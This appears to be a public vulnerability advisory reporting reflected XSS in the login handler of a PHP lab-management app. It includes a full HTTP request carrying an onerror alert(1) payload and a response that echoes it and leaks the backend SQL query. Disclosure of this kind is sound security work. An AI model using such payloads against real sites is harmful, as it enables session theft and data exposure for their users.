    ## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure## Author: nu11secur1ty## Date: 00/04/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the username request parameter is copied into the HTMLdocument as plain text between tags. The payload ro2iz<img src=aonerror=alert(1)>xggkt was submitted in the username parameter. This inputwas echoed unmodified in the application's response.STATUS: HIGH- Vulnerability[+]Exploits:- XSS-Reflected:```xssPOST /php-lms/classes/Login.php?f=login HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqmlOrigin: https://pwnedhost.comX-Requested-With: XMLHttpRequestReferer: https://pwnedhost.com/php-lms/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128","Chromium";v="128"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7```+ [Response]```HTTP/1.1 200 OKDate: Fri, 04 Oct 2024 08:27:39 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 177Connection: closeContent-Type: text/html; charset=UTF-8{"status":"incorrect","last_qry":"SELECT * from users where username ='VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}```## Reproduce:[href](https://www.patreon.com/nu11secur1ty)## Demo PoC:[href](https://www.patreon.com/nu11secur1ty)## Time spent:00:27:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Tag

#apple